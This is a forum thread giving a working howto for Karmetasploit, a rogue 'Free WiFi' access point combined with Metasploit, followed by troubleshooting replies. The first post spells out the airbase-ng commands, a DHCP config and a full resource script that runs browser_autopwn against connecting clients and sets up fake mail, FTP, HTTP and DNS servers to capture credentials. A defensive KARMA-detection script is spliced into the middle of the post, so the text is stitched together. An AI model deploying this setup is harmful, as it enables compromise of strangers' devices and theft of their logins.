
Thread: Karmetasploit Howto

  1. #1
    Member floyd
    Join Date
    Mar 2009
    Posts
    231

    Default Karmetasploit Howto

    I was bored with wireless cracking, so I wanted to try something different. I found Karmetasploit. It's nothing very challenging and I just copied and pasted the information from Karmetasploit – Metasploit and skipped/included things to fit BT 4 Pre Final! But maybe it's useful for someone...

    Karmetasploit is the merge of Karma and Metasploit. So you have an evil AP which accepts all connections and you have the powerful Metasploit. This is how it worked for me:

    First you could update your system with apt-get update && apt-get upgrade.

    Then make sure that injection is working:
    Code:
    airmon-ng start [wifi-interface]
    eg. airmon-ng start wlan0

    Code:
    aireplay-ng --test [monitor-interface]
    eg. aireplay-ng --test mon0

    If you only have 0 percent values, you likely need to fix your card so that injection works. Then set up the dhcp service:

    Code:
    mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.bak
    And write a new dhcpd.conf:

    Code:
    nano /etc/dhcp3/dhcpd.conf
    Write in the following:
    Code:
    option domain-name-servers 10.0.0.1;
    
    default-lease-time 60;
    max-lease-time 72;
    
    ddns-update-style none;
    
    authoritative;
    
    log-facility local7;
    
    subnet 10.0.0.0 netmask 255.255.255.0 {
      range 10.0.0.100 10.0.0.254;
      option routers 10.0.0.1;
      option domain-name-servers 10.0.0.1;
    }
    The next step is to set up a "Free" WiFi ...
    Code:
    airbase-ng -P -C 30 -e "Free WiFi" -v [monitor-interface]
    ... configure interface ...

    Code:
    ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
    ... configure dhcp for the at0 interface

    Code:
    dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
    You can ignore the error. Then you can place a new file, let's say to /root

    Code:
    nano /root/karma.rc
    with the following content
    Code:
    load db_sqlite3
    db_create /root/karma.db
    
    use auxiliary/server/browser_autopwn
    
    setg AUTOPWN_HOST 10.0.0.1
    setg AUTOPWN_PORT 55550
    setg AUTOPWN_URI /ads
    
    set LHOST 10.0.0.1
    set LPORT 45000
    set SRVPORT 55550
    set URIPATH /ads
    
    run
    
    
    use auxiliary/server/capture/pop3
    set SRVPORT 110
    set SSL false
    run
    
    use auxiliary/server/capture/pop3
    set SRVPORT 995
    set SSL true
    run
    
    use auxiliary/server/capture/ftp
    run
    
    use auxiliary/server/capture/imap
    set SSL false
    set SRVPORT 143
    run
    
    use auxiliary/server/capture/imap
    set SSL true
    set SRVPORT 993
    run
    
    use auxiliary/server/capture/smtp
    set SSL false
    set SRVPORT 25
    run
    
    use auxiliary/server/capture/smtp
    set SSL true
    set SRVPORT 465
    run
    
    use auxiliary/server/fakedns
    unset TARGETHOST
    set SRVPORT 5353
    run
    
    use auxiliary/server/fakedns
    unset TARGETHOST
    set SRVPORT 53
    run
    
    use auxiliary/server/capture/http
    set SRVPORT 80
    set SSL false
    run
    
    use auxiliary/server/capture/http
    set SRVPORT 8080
    set SSL false
    run
    
    use auxiliary/server/capture/http
    set SRVPORT 443
    set SSL true
    run
    
    use auxiliary/server/capture/http
    set SRVPORT 8443
    set SSL true
    run
    To start to exploit you can run

    Code:
    /pentest/exploits/framework3/msfconsole -r /root/karma.rc
    As soon as somebody (make sure that's you) connects, you get some messages on the screen. When you hit enter you get the Metasploit console, where you can type db_notes to see captured credentials. You could also use tcpdump on the at0 interface to capture the whole traffic.

    The interesting thing is to use another machine, connect to the "Free WiFi" and then try to reach an https page (deactivate NoScript and add an exception for the certificate!). You can see how Metasploit tries to exploit the other machine.

    I'm very interested in any feedback or how I could develop my evil AP further on...
    Auswaertsspiel
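The howto above relies on airbase-ng's -P behaviour, where one BSSID answers probes for whatever network name each nearby client asks for. From a defender's side that is also the most visible fingerprint of a KARMA-style rogue AP: a single BSSID seen answering for many unrelated ESSIDs. The following Python script is an added example (not part of the thread or of the Karmetasploit/aircrack-ng projects) that applies exactly that check to constructed probe-response records; the log line format, the MAC addresses and the threshold value are assumptions made for the example.

```python
"""Flag BSSIDs that answer probe requests for many distinct ESSIDs.

Added example for the thread above; not project code. The record format
below (timestamp, bssid, station, essid) is a constructed one that a
wireless IDS or a small packet-capture script might emit per probe response.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set


@dataclass(frozen=True)
class ProbeResponse:
    timestamp: str
    bssid: str     # AP that sent the probe response
    station: str   # client MAC the response was addressed to
    essid: str     # network name carried in the response


# Constructed sample: 00:1a:2b:3c:4d:5e is a normal AP that only answers for
# its own ESSID; 02:11:22:33:44:55 (locally administered MAC, as airbase-ng
# would use) echoes back whatever each client probed for.
SAMPLE_LOG = """\
2010-03-01T10:00:01 00:1a:2b:3c:4d:5e aa:bb:cc:00:00:01 HomeNet
2010-03-01T10:00:02 02:11:22:33:44:55 aa:bb:cc:00:00:01 HomeNet
2010-03-01T10:00:03 02:11:22:33:44:55 aa:bb:cc:00:00:02 CoffeeShop
2010-03-01T10:00:04 02:11:22:33:44:55 aa:bb:cc:00:00:03 linksys
2010-03-01T10:00:05 00:1a:2b:3c:4d:5e aa:bb:cc:00:00:04 HomeNet
2010-03-01T10:00:06 02:11:22:33:44:55 aa:bb:cc:00:00:04 Free WiFi
"""


def parse_log(text: str) -> List[ProbeResponse]:
    """Parse the constructed log format. ESSID is the last field and may
    contain spaces, so the line is split at most three times."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        parts = line.split(None, 3)
        if len(parts) != 4:
            raise ValueError(f"malformed record: {line!r}")
        ts, bssid, station, essid = parts
        records.append(ProbeResponse(ts, bssid.lower(), station.lower(), essid))
    return records


def essids_per_bssid(records: Iterable[ProbeResponse]) -> Dict[str, Set[str]]:
    """Map each BSSID to the set of ESSIDs it has answered for."""
    seen: Dict[str, Set[str]] = defaultdict(set)
    for r in records:
        seen[r.bssid].add(r.essid)
    return dict(seen)


def karma_suspects(records: Iterable[ProbeResponse], threshold: int = 3) -> List[str]:
    """Return BSSIDs that answered probes for at least `threshold` distinct
    ESSIDs. A legitimate AP normally answers for one (or a handful of)
    names; a KARMA-style AP answers for every name it is asked about.
    The threshold is an assumed tuning value, not a standard."""
    return sorted(
        bssid for bssid, names in essids_per_bssid(records).items()
        if len(names) >= threshold
    )


def affected_stations(records: Iterable[ProbeResponse], bssid: str) -> Set[str]:
    """Clients that received a probe response from the given BSSID, i.e. the
    devices an operator would want to check for an association to it."""
    return {r.station for r in records if r.bssid == bssid}


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for suspect in karma_suspects(recs):
        names = sorted(essids_per_bssid(recs)[suspect])
        print(f"suspect BSSID {suspect}: answered for {names}")
        print(f"  stations answered: {sorted(affected_stations(recs, suspect))}")
```

On real captures the same logic can be fed from the probe-response frames a monitor-mode interface sees; the threshold should be raised on networks where one AP legitimately serves several SSIDs (multi-SSID or guest networks), which is why it is a parameter rather than a fixed number.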

  2. #2
    Junior Member imported_pingu
    Join Date
    Sep 2006
    Posts
    40

    Default

    Well compiled, thanks!

  3. #3

    Default

    Thanks, I haven't actually tried this out yet, but may do so later on. Appreciate it!

    ~phoenix910

  4. #4
    Junior Member
    Join Date
    Nov 2008
    Posts
    69

    Default

    I ran this and it seemed to work very nicely, but I do have one problem: when I tried to change my dhcpd.conf to a .bak file it didn't save, and now whenever I start BackTrack it says dhcp3 failed. I'm not sure what it really does, but does anyone have their backup of it that they could send me or post, just to be safe?

  5. #5
    Moderator
    Join Date
    Jan 2010
    Posts
    167

    Default

    Quote Originally Posted by dragracekid View Post
    I ran this and it seemed to work very nicely, but I do have one problem: when I tried to change my dhcpd.conf to a .bak file it didn't save, and now whenever I start BackTrack it says dhcp3 failed. I'm not sure what it really does, but does anyone have their backup of it that they could send me or post, just to be safe?
    Boot the live CD and copy it from there ...

    m-1-k-3

  6. #6
    Member
    Join Date
    Jan 2010
    Posts
    332

    Default

    You can just remove dhcp from startup services.

    Code:
    # update-rc.d -f dhcp3-server remove
    SecurityTube has two new sections. Questions & News

  7. #7
    Junior Member
    Join Date
    Nov 2008
    Posts
    69

    Default

    Quote Originally Posted by m-1-k-3 View Post
    Boot the live CD and copy it from there ...

    m-1-k-3
    Didn't even think about that, I feel dumb lol

  8. #8
    Junior Member
    Join Date
    Dec 2007
    Posts
    88

    Default

    when I try to run the following command:

    airbase-ng -P -C 30 -e "Free WiFi" -v ath0

    I get an error message saying something about the "P" option does not exist. I checked the help and noticed that the "P" & "C" options are not listed. (It did exist before, but I ran the "apt-get update && apt-get upgrade" command and that's when airbase seems to have changed.)

    airbase-ng

    Airbase-ng 1.0 rc1 - (C) 2008 Thomas d'Otreppe
    Original work: Martin Beck
    http://www.aircrack-ng.org

    usage: airbase-ng <options> <replay interface>

    Options:

    -a bssid : set Access Point MAC address
    -i iface : capture packets from this interface
    -w WEP key : use this WEP key to en-/decrypt packets
    -h MAC : source mac for MITM mode
    -f disallow : disallow specified client MACs (default: allow)
    -W 0|1 : [don't] set WEP flag in beacons 0|1 (default: auto)
    -q : quiet (do not print statistics)
    -v : verbose (print more messages)
    -A : Ad-Hoc Mode (allows other clients to peer)
    -Y in|out|both : external packet processing
    -c channel : sets the channel the AP is running on
    -X : hidden ESSID
    -s : force shared key authentication (default: auto)
    -S : set shared key challenge length (default: 128)
    -L : Caffe-Latte WEP attack (use if driver can't send frags)
    -N : cfrag WEP attack (recommended)
    -x nbpps : number of packets per second (default: 100)
    -y : disables responses to broadcast probes
    -0 : set all WPA,WEP,open tags. can't be used with -z & -Z
    -z type : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
    -Z type : same as -z, but for WPA2
    -V type : fake EAPOL 1=MD5 2=SHA1 3=auto
    -F prefix : write all sent and received frames into pcap file

    Filter options:
    --bssid MAC : BSSID to filter/use
    --bssids file : read a list of BSSIDs out of that file
    --client MAC : MAC of client to filter
    --clients file : read a list of MACs out of that file
    --essid ESSID : specify a single ESSID (default: default)
    --essids file : read a list of ESSIDs out of that file

    --help : Displays this usage screen

    No replay interface specified.

  9. #9
    Good friend of the forums Eatme
    Join Date
    Aug 2009
    Location
    Socks5
    Posts
    308

    Default

    Is this something similar to the Karma.sh script, where you make a fake AP and DoS the targeted AP to go offline, so that the user will be directed to a fake login page or something like that, and will have the user put in a user name or the WPA???

    hxxp://fadzilmahfodh.blogspot.com/2009/07/8-wpa-hack-without-using-dictionary.html

  10. #10
    Super Moderator Archangel-Amael
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Quote Originally Posted by Eatme View Post
    Is this something similar to the Karma.sh script, where you make a fake AP and DoS the targeted AP to go offline, so that the user will be directed to a fake login page or something like that, and will have the user put in a user name or the WPA???

    hxxp://fadzilmahfodh.blogspot.com/2009/07/8-wpa-hack-without-using-dictionary.html
    Pay attention, read a little bit and comprehend what you read, instead of making useless posts.
    The first post states what this thread is about:
    Karmetasploit is the merge of Karma and Metasploit. So you have an evil AP which accepts all connections and you have the powerful Metasploit.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.
